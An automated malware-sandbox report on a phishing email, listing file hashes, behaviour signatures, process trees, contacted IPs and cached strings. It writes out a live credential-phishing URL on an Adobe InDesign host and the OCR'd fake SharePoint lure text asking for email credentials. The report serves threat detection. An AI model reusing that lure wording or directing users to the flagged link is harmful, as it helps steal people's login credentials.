Edit tour

Windows Analysis Report
EXTERNAL DESERT FORREST NURSERY LLC.msg

Overview

General Information

Sample Name:EXTERNAL DESERT FORREST NURSERY LLC.msg
Analysis ID:1332045
MD5:e84898d4c5aca756905273cd87bea657
SHA1:c2b07d83b895a596adb97133b57c4ec003749a87
SHA256:bfb4fb75c244df67a14c59b12c0aa49c147756c944bd7b5a15c721cb98aa0fe5
Infos:

Detection

Score:52
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Antivirus detection for URL or domain
Phishing site or detected (based on various OCR indicators)
Queries the volume information (name, serial number etc) of a device
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
Creates files inside the system directory
Enables security privileges
Stores files to the Windows start menu directory
HTML page contains hidden URLs or javascript code
JA3 SSL client fingerprint seen in connection with other malware
Queries time zone information
IP address seen in connection with other malware
Uses insecure TLS / SSL version for HTTPS connection
HTML body with high number of embedded SVGs detected

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64_ra
  • OUTLOOK.EXE (PID: 4076 cmdline: C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" /f "C:\Users\user\Desktop\EXTERNAL DESERT FORREST NURSERY LLC.msg MD5: 91A5292942864110ED734005B7E005C0)
    • ai.exe (PID: 5700 cmdline: C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\ai.exe" "514C220F-94D1-4724-9DCA-610A81398BDA" "87AE37A8-E611-4D04-A8FC-53B3877F621D" "4076" "C:\Program Files (x86)\Microsoft Office\Root\Office16\OUTLOOK.EXE" "WordCombinedFloatieLreOnline.onnx MD5: EC652BEDD90E089D9406AFED89A8A8BD)
    • chrome.exe (PID: 6492 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
      • chrome.exe (PID: 1624 cmdline: "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2008 --field-trial-handle=1952,i,18191314582763280315,6070070220069831171,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8 MD5: 45DE480806D1B5D462A7DDE4DCEFC4E4)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
No Snort rule has matched

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Source: https://indd.adobe.com/view/e174e561-569a-48e3-8548-c6c6e174aa25SlashNext: Label: Credential Stealing type: Phishing & Social Engineering

Phishing

barindex
Source: https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.htmlOCR Text: SharePoint You have receive 2 documents for review This message was sent to you to protect sensitive information .Dated Created: 10/23/2023 .Date Received: 10/23/2023 TO View documents "Click View and print Documents Online" TO receive and Download this file Please enter your specific email credentials that the document was sent to Secured Message Dashboard lofl English
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalHTTP Parser: Base64 decoded: http://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normal
Source: https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.htmlHTTP Parser: Total embedded SVG size: 169873
Source: https://indd.adobe.com/1_b50c358/public/build/contentHandler/contentHandler.html?basepath=https://indd.adobe.com&relativepath=/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.html&parentorigin=https://indd.adobe.com&maxPageDimensions={%22width%22:612,%22height%22:792}&transition=falseHTTP Parser: No favicon
Source: https://indd.adobe.com/1_b50c358/public/build/contentHandler/contentHandler.html?basepath=https://indd.adobe.com&relativepath=/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.html&parentorigin=https://indd.adobe.com&maxPageDimensions={%22width%22:612,%22height%22:792}&transition=falseHTTP Parser: No favicon
Source: https://indd.adobe.com/content/2/e174e561-569a-48e3-8548-c6c6e174aa25/1698074581431/package/1/publication.htmlHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalHTTP Parser: No favicon
Source: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/scl0v/0x4AAAAAAALzWnvdFcCpJJ1T/auto/normalHTTP Parser: No favicon
Source: blob:https://challenges.cloudflare.com/7ac0261a-2cff-42cc-945a-a8ea7213fcdbHTTP Parser: No favicon
Source: unknownHTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49739 version: TLS 1.0
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49735 version: TLS 1.2
Source: unknownHTTPS traffic detected: 13.85.23.86:443 -> 192.168.2.16:49824 version: TLS 1.2
Source: Joe Sandbox ViewJA3 fingerprint: 1138de370e523e824bbca92d049a3777
Source: Joe Sandbox ViewJA3 fingerprint: 28a2c9bd18a11de089ef85a160da29e4
Source: Joe Sandbox ViewIP Address: 63.140.38.186 63.140.38.186
Source: Joe Sandbox ViewIP Address: 63.140.38.180 63.140.38.180
Source: Joe Sandbox ViewIP Address: 104.17.3.184 104.17.3.184
Source: Joe Sandbox ViewIP Address: 162.247.243.30 162.247.243.30
Source: unknownHTTPS traffic detected: 23.1.237.25:443 -> 192.168.2.16:49739 version: TLS 1.0
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49865
Source: unknownNetwork traffic detected: HTTP traffic on port 49817 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49864
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49742
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49863
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49862
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49861
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49860
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49852 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49795 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49739
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49859
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49858
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49735
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49856
Source: unknownNetwork traffic detected: HTTP traffic on port 49772 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49734
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49855
Source: unknownNetwork traffic detected: HTTP traffic on port 49841 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49854
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49853
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49731
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49852
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49850
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49784 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49749 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49806 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49849
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49728
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49727
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49848
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49847
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49846
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49845
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49844
Source: unknownNetwork traffic detected: HTTP traffic on port 49674 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49722
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49843
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49721
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49842
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49841
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49791 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 49672 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49791
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49727 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49833 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49819
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49818
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49810 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49817
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49812
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49811
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49810
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49794 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49809
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49808
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49807
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49806
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49801
Source: unknownNetwork traffic detected: HTTP traffic on port 49739 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49800
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49809 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49673 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 23.1.237.25
Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknownTCP traffic detected without corresponding DNS query: 204.79.197.200
Source: unknownTCP traffic detected without corresponding DNS query: 209.197.3.8
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: unknownTCP traffic detected without corresponding DNS query: 13.85.23.86
Source: chromecache_114.4.drString found in binary or memory: * License: https://www.facebook.com/legal/license/t3hOLs8wlXy/ equals www.facebook.com (Facebook)
Source: chromecache_114.4.drString found in binary or memory: __d("LiveChatPluginConstants",["$InternalEnum"],(function(a,b,c,d,e,f){"use strict";a="LiveChatEvent/";c="mqtt";d=b("$InternalEnum")({CONNECTED:"Connected",CONNECTING:"Connecting",DISCONNECTED:"Disconnected"});e=250;b=a+"close_timestamps";var g=a+"reset_badging",h=a+"state",i=a+"switch_account",j=a+"typing",k=a+"unread_count",l=a+"update_message_list",m="platform/plugins/connect/guest",n=a+"guest_upgrade_success",o=a+"guest_upgrade_success_incognito",p=a+"navigate_to_welcome_page",q="platform/plugins/connect/access_token";a=a+"start_re_engagement";var r=124,s=187,t=24,u=424,v=288,w=313,x=219,y=40,z=36,A=24,B=18,C=708,D=540,E=244,F=202,G=509,H=430,I=6,J=0,K=1,L=-1,M="messaging_plugin",N=8634e4,O="#8A8D91",P="entrypoint:customer_chat_plugin",Q=0,R=1,S=2,T=3,U="new_message_update",V="initial_fetch",W=5e3,X="https://www.facebook.com/business/help/1661027437357021";f.MQTT=c;f.MQTTGatewayConnectionState=d;f.LOGIN_CHECK_INTERVAL=e;f.CLOSE_TIMESTAMPS=b;f.RESET_BADGING=g;f.STATE_UPDATE=h;f.SWITCH_ACCOUNT=i;f.TYPING_UPDATE=j;f.UNREAD_COUNT_UPDATE=k;f.UPDATE_MESSAGE_LIST=l;f.GUEST_MODE_CONNECT=m;f.GUEST_UPGRADE_SUCCESS=n;f.GUEST_UPGRADE_SUCCESS_INCOGNITO=o;f.NAVIGATE_TO_WELCOME_PAGE=p;f.ACCESS_TOKEN_LOGIN=q;f.START_RE_ENGAGEMENT=a;f.PROMPT_FALLBACK_HEIGHT=r;f.PROMPT_REDESIGN_FALLBACK_HEIGHT=s;f.PROMPT_CONTAINER_PADDING_HEIGHT=t;f.WELCOME_PAGE_GUEST_FALLBACK_HEIGHT=u;f.WELCOME_PAGE_NO_GUEST_FALLBACK_HEIGHT=v;f.WELCOME_PAGE_GUEST_FALLBACK_HEIGHT_WITH_COMPACT=w;f.WELCOME_PAGE_NO_GUEST_FALLBACK_HEIGHT_WITH_COMPACT=x;f.WELCOME_PAGE_ATTRIBUTION_OFFEST_HEIGHT=y;f.WELCOME_PAGE_ATTRIBUTION_OFFSET_HEIGHT_WITH_COMPACT=z;f.MAIN_IFRAME_PADDING_HEIGHT=A;f.MAIN_IFRAME_PADDING_HEIGHT_WITH_COMPACT=B;f.THREAD_PAGE_HEIGHT=C;f.THREAD_PAGE_HEIGHT_COMPACT=D;f.RE_ENGAGEMENT_COLLAPSED_DIALOG_HEIGHT=E;f.RE_ENGAGEMENT_COLLAPSED_DIALOG_HEIGHT_COMPACT=F;f.RE_ENGAGEMENT_EXPANDED_DIALOG_HEIGHT=G;f.RE_ENGAGEMENT_EXPANDED_DIALOG_HEIGHT_COMPACT=H;f.GREETING_TEXT_BOTTOM_SPACING_OFFEST=I;f.LOGGED_IN_CHAT_MODE=J;f.GUEST_CHAT_MODE=K;f.INVALID_CHAT_MODE=L;f.MESSENGING_PLUGIN=M;f.GUEST_SESSION_STORAGE_VALIDITY_MS=N;f.GUEST_SEND_BUTTON_COLOR_EMPTY_INPUT=O;f.LIVE_CHAT_ENTRYPOINT_ATTRIBUTION_TAG=P;f.ITP_CONSISTENCY_UNKNOWN_LOGGED_OUT=Q;f.ITP_CONSISTENCY_CONSISTENT_LOGGED_IN=R;f.ITP_CONSISTENCY_INCONSISTENT=S;f.ITP_CONSISTENCY_CONSISTENT_NO_ITP=T;f.NEW_MESSAGE_UPDATE=U;f.INITIAL_FETCH=V;f.PLUGIN_FADE_DELAY=W;f.HELP_DEX_LINK=X}),66); equals www.facebook.com (Facebook)
Source: chromecache_114.4.drString found in binary or memory: window.FB&&window.FB.__buffer&&(window.__buffer=babelHelpers["extends"]({},window.FB.__buffer)); } }).call(global);})();} catch (e) {var i = new Image();i.crossOrigin = 'anonymous';i.dataset.testid = 'fbSDKErrorReport';i.src='https://www.facebook.com/platform/scribe_endpoint.php/?c=jssdk_error&m='+encodeURIComponent('{"error":"LOAD", "extra": {"name":"'+e.name+'","line":"'+(e.lineNumber||e.line)+'","script":"'+(e.fileName||e.sourceURL||e.script||"sdk.js")+'","stack":"'+(e.stackTrace||e.stack)+'","revision":"1009470316","namespace":"FB","message":"'+e.message+'"}}');document.body.appendChild(i);} equals www.facebook.com (Facebook)
Source: prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drString found in binary or memory: http://augloop.office.com/settings.json
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: http://b.c2r.ts.cdn.office.net/pr
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr
Source: chromecache_128.4.drString found in binary or memory: http://hammerjs.github.io/
Source: prep_ram Files (x86)_Microsoft Office_root_Office16_AugLoop_bundle_js_V8_perf.cache.0.drString found in binary or memory: http://json-schema.org/draft-07/schema#
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: http://olkflt.edog.officeapps.live.com/olkflt/outlookflighting.svc/api/glides
Source: chromecache_125.4.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dac8
Source: chromecache_125.4.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dacd
Source: chromecache_125.4.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dad8
Source: chromecache_125.4.drString found in binary or memory: http://typekit.com/eulas/00000000000000007735dada
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: http://weather.service.msn.com/data.aspx
Source: chromecache_139.4.drString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: chromecache_143.4.drString found in binary or memory: https://aadcdn.msauth.net/shared/1.0/content/images/backgrounds/2_11d9e3bcdfede9ce5ce5ace2d129f1c4.s
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/acquisitionlogging
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/app/download
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/authenticated
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/preinstalled
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/appinstall/unauthenticated
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinsinstallation.store.office.com/orgid/appinstall/authenticated
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinslicensing.store.office.com/apps/remove
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinslicensing.store.office.com/commerce/query
Source: E8FDCC6F-05E8-4894-ABE7-83B9B4453CC2.0.drString found in binary or memory: https://addinslicensing.store.office.com/entitlement/query
